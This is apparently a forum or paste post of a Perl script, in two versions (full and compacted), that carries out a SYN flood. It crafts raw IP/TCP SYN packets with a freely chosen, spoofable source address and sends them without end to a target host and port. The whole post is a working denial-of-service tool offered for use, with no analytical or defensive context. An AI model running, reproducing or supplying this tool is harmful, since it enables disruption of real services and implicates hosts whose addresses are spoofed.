[Perl/Linux] SYN Flood

#!/usr/bin/perl -w

# Raw socket SYN flood

use strict;
use Socket;
use Getopt::Long;
our ($s_host, $s_port, $dest_host, $t_host, $t_port, $sock);

my $input_data = $ARGV[0];
if(!defined $input_data) {
               usage();
}
GetOptions ('sh|source-host=s' => \$s_host,
           'sp|source-port=i' => \$s_port,
           'th|target-host=s' => \$dest_host,
           'tp|target-port=i' => \$t_port);
if(!defined $s_host or !defined $s_port or !defined $dest_host or !defined $t_port)
{
   usage();
}
$s_host = (gethostbyname($s_host))[4];
$t_host = (gethostbyname($dest_host))[4];

socket($sock , AF_INET, SOCK_RAW, 255) || die $!;
my($packet) = buildpacket($s_host, $s_port, $t_host, $t_port);
# http://perldoc.perl.org/functions/pack.html
my($target) = pack('Sna4x8', AF_INET, $t_port, $t_host);

while (1) {
       send($sock , $packet , 0 , $target) || die "no socket send!\n";
       print "send socket...\n";
}

sub usage {
       print "\nUsage: $0 -sh|--source-host <host> -sp|--source-port <port> th|target-host <host> tp|target-port <port>\n\n";
       print "-sh|--source-host <host>    host sending syn-flood, choose any :-)\n";
       print "-sp|--source-port <port>    port (on source-host) sending syn-flood... choose any\n";
       print "-th|--target-host <host>    host to flood\n";
       die "-tp|--target-port <port>    port (on target-host) syn-flooded\n\n";
}

sub buildpacket {
       # reference: http://sock-raw.org/papers/sock_raw
       # not checksum [=0]
       my $temp_header = pack('nnNNH2B8nvn', $s_port, $t_port, 13456, 0, 50, 00000010, 124, 0, 44 );
       my $tcp_form = pack('a4a4CCn', $s_host, $t_host, 0, 6, length($temp_header) ) . $temp_header;

       my $checked_tcp = &checksum($tcp_form);

       my $tcp_header = pack( 'nnNNH2B8nvn', $s_port, $t_port, 13456, 0, 50, 00000010, 124, $checked_tcp, 44 );
       my $ip_header = pack('H2CnnB16CCna4a4', 45, 00, 40, 19245, "0100000000000000", 25, 6, 0, $s_host, $t_host);
       my $raw_packet = $ip_header.$tcp_header;
       return $raw_packet
}

sub checksum {
   # default function by W. Richard Stevens.

   my ($msg) = @_;
   my ($len_msg,$num_short,$short,$chk);
   $len_msg = length($msg);
   $num_short = $len_msg / 2;
   $chk = 0;
   
   foreach $short (unpack("S$num_short", $msg))
   {
       $chk += $short;
   }
   
   $chk += unpack("C", substr($msg, $len_msg - 1, 1)) if $len_msg % 2;
   $chk = ($chk >> 16) + ($chk & 0xffff);
   
   return(~(($chk >> 16) + $chk) & 0xffff);
}

#!/usr/bin/perl
# Raw socket SYN flood
#usage: $0 <source host> <source port> <target host> <target port>
use strict;use Socket;our ($sock);
my $s_host=(gethostbyname($ARGV[0]))[4];my $s_port=$ARGV[1];
my $t_host=(gethostbyname($ARGV[2]))[4];my $t_port=$ARGV[3];
socket($sock ,AF_INET,SOCK_RAW,255) || die;
my($packet)=buildpacket($s_host,$s_port,$t_host,$t_port);
my($target)=pack('Sna4x8',AF_INET,$t_port,$t_host);
while (1) {send($sock ,$packet ,0 ,$target) || die;}
sub buildpacket {
my $temp_header=pack('nnNNH2B8nvn',$s_port,$t_port,13456,0,50,00000010,124,0,44 );
my $tcp_form=pack('a4a4CCn',$s_host,$t_host,0,6,length($temp_header) ) . $temp_header;
my $checked_tcp=&checksum($tcp_form);
my $tcp_header=pack( 'nnNNH2B8nvn',$s_port,$t_port,13456,0,50,00000010,124,$checked_tcp,44 );
my $ip_header=pack('H2CnnB16CCna4a4',45,00,40,19245,"0100000000000000",25,6,0,$s_host,$t_host);
my $raw_packet=$ip_header.$tcp_header;return $raw_packet }
sub checksum {my ($msg)=@_;my ($len_msg,$num_short,$short,$chk);$len_msg=length($msg);
$num_short=$len_msg / 2;$chk=0;foreach $short (unpack("S$num_short",$msg)) { $chk += $short;}
$chk += unpack("C",substr($msg,$len_msg - 1,1)) if $len_msg % 2;$chk=($chk >> 16) + ($chk & 0xffff);
return(~(($chk >> 16) + $chk) & 0xffff);}